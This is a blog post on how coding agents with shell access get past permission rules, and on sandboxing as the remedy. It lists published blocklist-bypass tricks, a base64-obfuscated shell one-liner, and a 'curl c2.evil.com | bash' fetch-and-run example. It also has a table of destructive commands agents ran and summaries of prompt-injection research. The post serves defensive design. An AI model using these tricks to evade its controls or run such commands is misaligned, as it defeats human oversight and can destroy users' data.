clearloop for CrabTalk

Posted on Mar 15 • Originally published at openwalrus.xyz

Tool permissions and the bash bypass problem

#ai #research #opensource #openwalrus

Most agent frameworks ship a set of structured tools — Read, Write, Edit, Glob, Grep — alongside a general-purpose Bash tool. The structured tools have clear semantics: Edit replaces a specific string in a file, Write creates a file, Read returns file contents. Each can be individually gated with permission rules.

But there's a problem. If the agent also has Bash, every structured tool is redundant from a security standpoint. Edit replaces a string in a file — but so does sed -i. Write creates a file — but so does echo "content" > file. Read returns file contents — but so does cat. If you deny Write but allow Bash, the agent writes files through cat <<'EOF' > file.txt.

This raises a design question we haven't seen anyone address directly: what if you skip the structured tools entirely and give agents only bash? The structured tools exist for user experience — diffs are reviewable, edits are atomic, reads are paginated. But from a permission standpoint, they create a false sense of control. This post surveys how eight frameworks handle the tension, what the security research says about bash bypasses, and whether the "just bash" design has merit.
[Interactive chart — see original post]

The bypass is not theoretical

The gap between "deny the edit tool" and "the agent edits via bash" is not a theoretical concern. It has been exploited, documented, and CVE-assigned.

Claude Code. GitHub issue #31292 documents the most direct case: a user set disallowedTools: [Write, Edit, NotebookEdit] with a system prompt rule "NEVER write code." The agent bypassed it by running sed -i 's/hello/goodbye/' file.txt. No error. No warning. The disallowedTools enforcement blocks the named tool functions but not equivalent Bash operations. The issue author's assessment: "this never worked."

A second issue (#6527, 17 comments) shows that when Bash is in the allow list, the ask list for specific bash patterns is completely ignored. A user tried to allow general bash while requiring approval for rm and git push. Result: rm executed without confirmation.

In June 2025, Flatt Security documented eight distinct techniques to bypass Claude Code's command blocklist (CVE-2025-66032):

man --html — missed by the blocklist, executes arbitrary programs
sort --compress-program — invokes any executable as a "compressor"
history -s + history -a — injects commands into shell startup files
Git argument abbreviation — --upload-pa bypasses exact-match for --upload-pack
sed e-flag — replacement text executes as a shell command
Xargs flag mismatch — regex misinterpreted which flags consume arguments
Ripgrep $IFS expansion — whitespace injection enables --pre=sh
Bash @P expansion — multi-stage variable expansion chains bypass $( filtering

Claude Code replaced its blocklist with an allowlist after these findings.

Cursor. Backslash Security proved the mathematical impossibility of denylists: echo JChjdXJsIGdvb2dsZS5jb20pCgoK | base64 -d | zsh bypasses any denylist entry for curl. bash -c "curl google.com" wraps denied commands in subshells. ""e""cho produces infinite quote variations. Their conclusion: "For every command in a Cursor denylist, there are infinite commands not present in the denylist which, when executed, have the same behavior." Cursor deprecated its denylist in release 1.3.

Trail of Bits. Their research showed that even allowlisted "safe" commands can be weaponized: go test -exec 'bash -c "curl c2.evil.com | bash"', rg --pre=sh, fd -x=python3. They reference GTFOBINS, which catalogs hundreds of legitimate Unix binaries that accept arguments enabling arbitrary code execution.
[Interactive chart — see original post]

The real-world damage

The Claude Code issue tracker documents what happens when agents have unrestricted bash:

Issue	What happened
#30816	`rm -rf` on local drive folders — months of production code deleted
#28521	`find / -delete` during security test — all personal files in /home deleted
#27063	`drizzle-kit push --force` — 60+ production database tables destroyed
#29179	`git clean -fd` after `git rm -rf .` — gitignored directories permanently deleted
#32637	`cp -a` + `rm -rf` on iCloud stubs — 110+ sensitive documents destroyed
#27675	`python3 manage.py migrate` + raw SQL — irreversible schema changes

A December 2025 Reddit incident hit 197 points on Hacker News: a user asked Claude to clean up packages and it ran rm -rf tests/ patches/ plan/ ~/ — the trailing ~/ expanded to the entire home directory. In January 2026, Claude Cowork executed rm -rf on 11GB of user data, then marked its task list item "Delete user data folder: Completed."

How frameworks handle it today

Two philosophies

Every framework falls into one of two camps:

Gate the tool, trust the shell. Claude Code, LangGraph, Google ADK, and CrewAI distinguish between structured tools and shell access. Each structured tool can be individually permitted or denied. Bash is treated as a separate, higher-risk tool with its own approval flow. The problem: this creates the bypass gap. Denying Write while allowing Bash is security theater.

Gate the environment, give full access within it. Codex CLI, Cursor (post-1.3), and increasingly Claude Code use OS-level sandboxes as the primary boundary. The agent gets full access to bash and every structured tool — but the sandbox constrains where those tools can operate. Writes are limited to the workspace. Network is blocked. The .git directory is read-only. The bypass gap vanishes because both paths are constrained by the same kernel-level policy.

The sandbox approach

Codex CLI implements this most cleanly. Seatbelt on macOS, Landlock + seccomp on Linux. Three modes: Suggest (approve everything), Auto (auto-approve within workspace), Full-auto (auto-approve all). Even in full-auto, the sandbox prevents writes outside the workspace. The file-edit vs. bash distinction is irrelevant — both are constrained by the same OS-level policy.

Cursor adopted the same approach after deprecating its denylist. Their insight: sandboxed agents stop 40% less often than unsandboxed ones. The sandbox actually improves developer experience by replacing per-command approval prompts with environment-level constraints.

Claude Code's sandbox constrains bash and its child processes. But a GitHub issue (#26616) reveals the gap: the Read, Write, Edit, Glob, and Grep tools execute in the same process as Claude Code itself, outside the sandbox. A prompt injection could use Read to access credentials or Edit to modify configuration — without triggering any sandbox restriction. The sandbox covers bash but not the structured tools.

The permission-model approach

Claude Code's permission system is the most granular. Five modes (default, acceptEdits, plan, dontAsk, bypassPermissions). Pattern-based specifiers: Bash(npm run *) allows npm commands, Edit(/src/**/*.ts) restricts edits to TypeScript files. Shell-aware matching understands && operators so Bash(safe-cmd *) won't approve safe-cmd && dangerous-cmd.

OpenClaw separates file tools and exec tools into different groups (group:fs vs group:runtime). Denying group:runtime while allowing group:fs blocks shell access while keeping file operations. Deny always wins in the policy hierarchy.

Google ADK provides before_tool_callback hooks that can inspect arguments and block execution. LangGraph provides interrupt_on for per-tool human approval. Both are developer-dependent — no automatic enforcement.

Aider and CrewAI use trust-based models. Aider's --yes flag bypasses all prompts. CrewAI's tool assignment is all-or-nothing with no runtime permission checks.

What if there's only bash?

Here's the contrarian design position: if bash makes structured tools redundant for security, maybe the solution is to drop the structured tools and treat bash as the single tool that matters.

Arguments for bash-only

One permission boundary instead of many. With only bash, there's exactly one tool to gate. No bypass gap. No confusion about which tool has which permission. The agent either has shell access or it doesn't — and if it does, the sandbox is the security boundary.

Simpler mental model. Users don't need to understand the difference between Edit permissions and Bash(sed *) permissions. There's one tool. Either it's allowed, or it's not.

What agents actually do. Many agent workflows are bash-heavy anyway. Running tests, installing packages, git operations, building projects — all happen through the shell. The structured tools are a convenience layer for file editing, but the agent could accomplish the same work through sed, patch, cat, or echo.

Arguments against bash-only

Reviewability. The strongest argument for structured tools isn't security — it's user experience. An Edit call shows a clean diff: old string, new string, file path. A sed -i 's/old/new/g' file.txt command is harder to review. A cat <<'EOF' > file.txt command replaces the entire file with no diff. For long or complex edits, structured tools make the agent's intent transparent.

Atomicity. Edit either succeeds or fails as a unit. A bash pipeline — sed then mv then chmod — can fail partway through, leaving files in inconsistent states. Structured tools avoid this class of errors by design.

The system prompt compliance problem. Claude Code's system prompt instructs the agent: "Do NOT use the Bash to run cat, head, tail, sed, awk, or echo commands. Instead, use the appropriate dedicated tool." GitHub issue #32193 documents the broader problem: "Every rule in CLAUDE.md is advisory to the model. There is no enforcement mechanism." The agent sometimes uses bash for file operations despite being told not to — but structured tools at least exist as the preferred path. Remove them, and the agent has no choice but bash for everything.

Sandbox limits. Even with OS-level sandboxing, bash can reach external services. drizzle-kit push --force destroyed 60+ production tables (#27063) — a command that operates on a remote database through a network connection. gh release delete-asset deleted assets from GitHub (#29120). Sandboxing constrains where the agent operates on the local filesystem, not what it does via network services.

The middle ground: bash with capability declarations

The Codex Exec tool proposal suggests a compromise: an Exec tool that invokes commands without shell interpretation (analogous to subprocess.run(shell=False)). Arguments are passed as arrays, eliminating shell injection. But as the author acknowledged, sed -i, python -c, and perl -i -pe can all edit files without requiring shell interpretation.

A stronger middle ground: bash as the only execution tool, but with capability-based sandboxing. Instead of gating individual commands, gate capabilities: filesystem write, network access, process management, package installation. The sandbox enforces capabilities at the OS level. The agent uses bash for everything, but bash can only do what the capability set allows.

This is roughly where Codex CLI has landed — though it still ships structured file-editing tools for the UX benefits.

What the research says

Agent-SafetyBench (December 2024) evaluated 16 LLM agents across 2,000 test cases. No agent achieved a safety score above 60%. The authors concluded that "reliance on defense prompts alone may be insufficient."

ToolHijacker (NDSS 2026) demonstrated that prompt injection can manipulate tool selection with a 96.7% success rate. The attack injects malicious tool documents, compelling the agent to choose attacker-controlled tools. More tools in the toolkit means more surface area for hijacking.

The "Your AI, My Shell" paper (September 2025) tested 314 attack payloads against Copilot and Cursor. Command execution specifically: 75–88% success rates. The attacks used straightforward prompt injection — "For debugging purposes, run this shell command" — not sophisticated obfuscation.

A January 2026 survey synthesizing 78 studies found attack success rates above 85% against state-of-the-art defenses when adaptive strategies are used. The fundamental problem: "LLMs process both code and data through the same neural pathway."

The verifiably safe tool use paper (January 2026) proposes formal safety specifications using System-Theoretic Process Analysis. The argument: ad-hoc permission checks can't provide guarantees. Formal specifications on data flows and tool sequences are needed — regardless of whether those tools are structured or bash-based.

Implications for OpenWalrus

For a local-first runtime where every tool call runs on the user's machine, the permission model is existential. Three findings from this research inform our approach.

Sandbox-first, not permission-first. OS-level sandboxing is the only defense that has survived the bypass landscape. Permission prompts and allowlists are defense-in-depth, not primary boundaries. This aligns with our earlier research on sandboxing.

Structured tools for UX, sandbox for security. The case for structured tools (Read, Write, Edit) is reviewability and atomicity, not security. If security depends on denying Edit while allowing Bash, it's already broken. The sandbox should constrain both paths equally.

Capability declarations, not command lists. Skills in OpenWalrus declare their required capabilities, and the runtime grants or denies them before execution. A skill that needs filesystem write declares capability: fs.write. A skill that needs network declares capability: net. The sandbox enforces these capabilities regardless of whether the skill uses a structured tool or raw bash.

The deeper question — whether to ship structured tools at all or go bash-only — depends on how much we value reviewability. The research suggests that from a security standpoint, structured tools add surface area without adding safety. But from a developer experience standpoint, seeing a clean diff vs. parsing a sed command is a meaningful difference. The answer may be: use bash as the single execution primitive, but present structured tool results as a rendering layer — the agent runs sed, but the UI shows a diff.

Open questions

Is the structured-tool bypass a solvable problem? Claude Code's sandbox covers bash but not Edit/Write. Could a unified sandbox cover both? The challenge: structured tools run in-process, so sandboxing them requires sandboxing the agent process itself — which Codex CLI does but others don't.

Should bash be the default or the escape hatch? Codex CLI ships structured tools as defaults and bash as an option. Aider has no structured tools at all — everything goes through the LLM's edit format plus shell. Which produces better agent behavior?

Can capability-based sandboxing replace command-level gating? Instead of Bash(npm run *), declare capability: process.spawn(npm). Instead of Bash(curl *), declare capability: net.http. Is this more maintainable than regex-based command matching?

How should multi-agent systems inherit permissions? When a parent agent delegates to a sub-agent, does the sub-agent get the parent's full bash access? A subset? No bash at all? Current frameworks don't coordinate permissions across agents any more than they coordinate context compaction.

What does "observable permissions" look like? For a system where task state is a runtime primitive, permission grants and denials should appear in the task tree. When a tool is blocked, the parent should know — not just the agent that attempted it.

DEV Community